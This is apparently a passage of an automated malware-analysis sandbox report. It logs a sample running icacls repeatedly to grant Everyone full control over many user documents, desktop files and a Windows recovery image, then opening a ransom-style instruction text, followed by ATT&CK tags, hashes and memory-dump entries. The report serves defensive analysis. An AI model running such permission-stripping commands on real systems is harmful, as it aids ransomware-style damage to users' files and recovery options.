- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Files.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1548
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\FindMeasure.pot /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1776
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\FormatMerge.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1400
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\GrantSkip.xlsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:988
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\InvokeAdd.pps /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1924
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\LimitImport.wps /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1664
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\LimitSuspend.dotx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1912
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\LimitUnblock.xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:996
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\MergePublish.vsd /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1440
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\MergeSelect.xlsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:668
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\MoveMount.xlsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1752
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Opened.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:960
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\OutMove.xltx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1636
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\PingGet.vsdx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1940
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\PopRepair.xlsb /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1536
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ReceiveDeny.xlt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1164
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ReceiveInvoke.mht /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1700
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Recently.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1760
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\RedoSet.potx /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1200
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\RenamePop.xlsx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1240
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ResetFormat.xlsx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:816
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SaveJoin.html /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1600
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SearchMount.odt /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2024
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SetSend.mpp /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1756
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SetWrite.vst /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1912
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ShowSplit.xls /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1432
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\StepSend.ppsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:936
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\StepUnregister.ppt /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1872
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SubmitJoin.ppsx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:856
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SwitchConfirm.docm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1888
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\These.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:864
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UninstallSave.mht /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1440
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UnregisterStop.pub /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1976
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ApproveSearch.wmv /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1712
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ApproveStop.svg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:984
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\BackupGrant.ps1xml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1308
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\CloseEnter.wmv /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1760
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ConvertToRepair.easmx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1548
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\CopyWait.m1v /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1972
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\DebugExport.mpeg2 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1532
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\DisconnectGrant.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1732
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\EnableClear.dib /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1664
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\EnableFormat.mid /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1556
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ExpandReset.ppsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1624
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ImportCopy.svg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1144
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\InitializeCompare.jpeg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:188
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\InstallRedo.mpeg3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:524
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\InstallUnprotect.avi /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2024
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\LockWait.bin /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1012
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\MergeRequest.cr2 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:628
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\OutBlock.mpv2 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1644
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\OutMove.vdw /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1948
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\PingResolve.mid /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1720
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\RedoSwitch.gif /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1744
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ResetDebug.wma /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1320
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ResolveJoin.vbs /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:952
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ResumeExport.mhtml /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1548
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\SplitStop.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:936
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\StartExit.pot /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1556
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\UnpublishLimit.tiff /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1144
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\WaitSearch.docx /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:188
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\WaitSwitch.zip /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1656
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Contacts\Admin.contact /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:668
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Recovery\6e3e77a2-1a56-11ec-8d0f-c222d480bba6\Winre.wim /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:864
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Инструкция.txt
  2⤵
  PID:1164
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:1172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "581951827406007979-8277249411725863893469418953-15513081409318162871396877737"
1⤵
PID:864

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-177433515-208415569265536847519055132071772541053-12433950754489326672048035547"
1⤵
PID:1492

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
d1380e71e696f25dfab6eda768c061a7

SHA1
a1b78ad9e6be3bf14ad29cbbd4ef326bf49c9f01

SHA256
0ecfd5eba026e19bcb0d1acffd24010a75e00cbfcc38408687aa4f880f6773fc

SHA512
e2b6decd0adcbf04826bece3f488b1362d48c21987be08a51418c1af96e7ca200fea5673a76d6d85ac5d37e7b23e5462ac07c286bb80995e0d2f4e7161f1e7e1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5
d1380e71e696f25dfab6eda768c061a7

SHA1
a1b78ad9e6be3bf14ad29cbbd4ef326bf49c9f01

SHA256
0ecfd5eba026e19bcb0d1acffd24010a75e00cbfcc38408687aa4f880f6773fc

SHA512
e2b6decd0adcbf04826bece3f488b1362d48c21987be08a51418c1af96e7ca200fea5673a76d6d85ac5d37e7b23e5462ac07c286bb80995e0d2f4e7161f1e7e1

Download Submit
C:\Users\Admin\Desktop\Инструкция.txt

MD5
63eee7d929fbfc004c59e973a4333053

SHA1
022d0e55c5f0e78c2446699bcab9ad0aa3d7fd03

SHA256
e8121bbe477d1f9b2150691ec8f605d5004e5570730d3b0cc9acb346ba323a92

SHA512
3668ff53dbf8091edcc8c4aef8b6d544591d506360ea5c926d4889f771ffa843c713f10b4f9285baae81e8e5bfe3285a7c71e6f98554db1465d256faac7abe43

Download Submit
memory/288-86-0x0000000000000000-mapping.dmp

Download
memory/324-68-0x0000000000000000-mapping.dmp

Download
memory/536-69-0x0000000000000000-mapping.dmp

Download
memory/540-112-0x0000000000000000-mapping.dmp

Download
memory/652-79-0x0000000000000000-mapping.dmp

Download
memory/668-71-0x0000000000000000-mapping.dmp

Download
memory/668-100-0x0000000000000000-mapping.dmp

Download
memory/752-106-0x0000000000000000-mapping.dmp

Download
memory/856-127-0x0000000000000000-mapping.dmp

Download
memory/864-113-0x0000000000000000-mapping.dmp

Download
memory/892-115-0x0000000000000000-mapping.dmp

Download
memory/896-114-0x0000000000000000-mapping.dmp

Download
memory/896-72-0x0000000000000000-mapping.dmp

Download
memory/976-93-0x0000000000000000-mapping.dmp

Download
memory/996-119-0x0000000000000000-mapping.dmp

Download
memory/1012-120-0x0000000000000000-mapping.dmp

Download
memory/1048-64-0x0000000002350000-0x0000000002F9A000-memory.dmp

Filesize
12.3MB

Download
memory/1048-58-0x0000000000000000-mapping.dmp

Download
memory/1088-54-0x0000000001120000-0x0000000001121000-memory.dmp

Filesize
4KB

Download
memory/1088-56-0x00000000047A0000-0x00000000047A1000-memory.dmp

Filesize
4KB

Download
memory/1164-117-0x0000000000000000-mapping.dmp

Download
memory/1172-137-0x000007FEFC271000-0x000007FEFC273000-memory.dmp

Filesize
8KB

Download
memory/1172-138-0x0000000004250000-0x0000000004251000-memory.dmp

Filesize
4KB

Download
memory/1212-116-0x0000000000000000-mapping.dmp

Download
memory/1252-90-0x0000000000000000-mapping.dmp

Download
memory/1308-104-0x0000000000000000-mapping.dmp

Download
memory/1320-111-0x0000000000000000-mapping.dmp

Download
memory/1360-66-0x0000000000000000-mapping.dmp

Download
memory/1388-110-0x0000000000000000-mapping.dmp

Download
memory/1416-63-0x0000000001CE1000-0x0000000001CE2000-memory.dmp

Filesize
4KB

Download
memory/1416-103-0x0000000000000000-mapping.dmp

Download
memory/1416-65-0x0000000001CE2000-0x0000000001CE4000-memory.dmp

Filesize
8KB

Download
memory/1416-62-0x0000000001CE0000-0x0000000001CE1000-memory.dmp

Filesize
4KB

Download
memory/1416-59-0x0000000076A81000-0x0000000076A83000-memory.dmp

Filesize
8KB

Download
memory/1416-57-0x0000000000000000-mapping.dmp

Download
memory/1424-126-0x0000000000000000-mapping.dmp

Download
memory/1432-88-0x0000000000000000-mapping.dmp

Download
memory/1444-122-0x0000000000000000-mapping.dmp

Download
memory/1444-108-0x0000000000000000-mapping.dmp

Download
memory/1468-132-0x0000000002430000-0x000000000307A000-memory.dmp

Filesize
12.3MB

Download
memory/1468-95-0x0000000000000000-mapping.dmp

Download
memory/1484-94-0x0000000000000000-mapping.dmp

Download
memory/1532-78-0x0000000000000000-mapping.dmp

Download
memory/1540-109-0x0000000000000000-mapping.dmp

Download
memory/1544-77-0x0000000000000000-mapping.dmp

Download
memory/1564-105-0x0000000000000000-mapping.dmp

Download
memory/1584-121-0x0000000000000000-mapping.dmp

Download
memory/1592-74-0x0000000000000000-mapping.dmp

Download
memory/1612-129-0x0000000000000000-mapping.dmp

Download
memory/1624-81-0x0000000000000000-mapping.dmp

Download
memory/1628-97-0x0000000000000000-mapping.dmp

Download
memory/1644-96-0x0000000000000000-mapping.dmp

Download
memory/1648-89-0x0000000000000000-mapping.dmp

Download
memory/1656-75-0x0000000000000000-mapping.dmp

Download
memory/1656-123-0x0000000000000000-mapping.dmp

Download
memory/1664-118-0x0000000000000000-mapping.dmp

Download
memory/1696-84-0x0000000000000000-mapping.dmp

Download
memory/1696-124-0x0000000000000000-mapping.dmp

Download
memory/1720-85-0x0000000000000000-mapping.dmp

Download
memory/1728-73-0x0000000000000000-mapping.dmp

Download
memory/1728-125-0x0000000000000000-mapping.dmp

Download
memory/1760-98-0x0000000000000000-mapping.dmp

Download
memory/1764-101-0x0000000000000000-mapping.dmp

Download
memory/1764-67-0x0000000000000000-mapping.dmp

Download
memory/1796-87-0x0000000000000000-mapping.dmp

Download
memory/1812-80-0x0000000000000000-mapping.dmp

Download
memory/1876-128-0x0000000000000000-mapping.dmp

Download
memory/1904-76-0x0000000000000000-mapping.dmp

Download
memory/1912-91-0x0000000000000000-mapping.dmp

Download
memory/1932-92-0x0000000000000000-mapping.dmp

Download
memory/1956-99-0x0000000000000000-mapping.dmp

Download
memory/1972-107-0x0000000000000000-mapping.dmp

Download
memory/2000-70-0x0000000000000000-mapping.dmp

Download
memory/2020-83-0x0000000000000000-mapping.dmp

Download